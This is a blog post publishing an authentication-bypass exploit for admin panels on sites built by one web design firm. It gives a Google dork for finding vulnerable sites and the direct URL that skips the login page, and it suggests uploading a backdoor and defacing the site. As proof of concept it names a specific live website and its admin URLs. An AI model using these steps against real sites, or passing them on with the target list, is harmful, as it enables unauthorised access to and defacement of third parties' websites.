Linux Optic Web Design and development- Login Bypass

Hello,

I am posting my exploit Linux Optic Web Design and development- Login Bypass which has got CVS (Critical Vulnerability Scaling) of 8.1 out of 10.

https://www.milw00rm.com/exploits/9777

http://www.vulnerability-lab.com/get_content.php?id=1585

https://packetstormsecurity.com/files/133356/LinuxOptic-CMS-2009-Authentication-Bypass.html

# Exploit Title: Direct login to admin panel without entering password
# Google Dork: Design by www.linuxoptic.com 2009
# Date: 2015-07-10
# Exploit Author: Aaditya Purani
# Vendor Homepage: www.linuxoptic.com
# Software Link: No software link
# Version: 2009 Web admin login panel
# Tested on: Kali Linux/ Windows 7
# CVE : Critical Vulnerability

Hello,
This is Aaditya purani and i have found a critical bug in websites which has been designed by Linuxoptic.
First type the dork "Design by www.linuxoptic.com 2009" in google without Double quotes(").

Then after find the site in which their is written Design by www.linuxoptic.com 2009 in the footer

Now, go to it's admin page http://www.targetsite.com/adminpanel

After opening the admin panel . Follow this link http://www.targetsite.com/adminpanel/home.php

And voila you will be directly login into the admin panel and you can also upload your backdoor and deface.

#POC: 
Site: http://www.carrefamily.com/

It's admin panel : http://www.carrefamily.com/adminpanel

Directly login to admin panel : http://www.carrefamily.com/adminpanel/home.php

Thank you
Advertisement

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s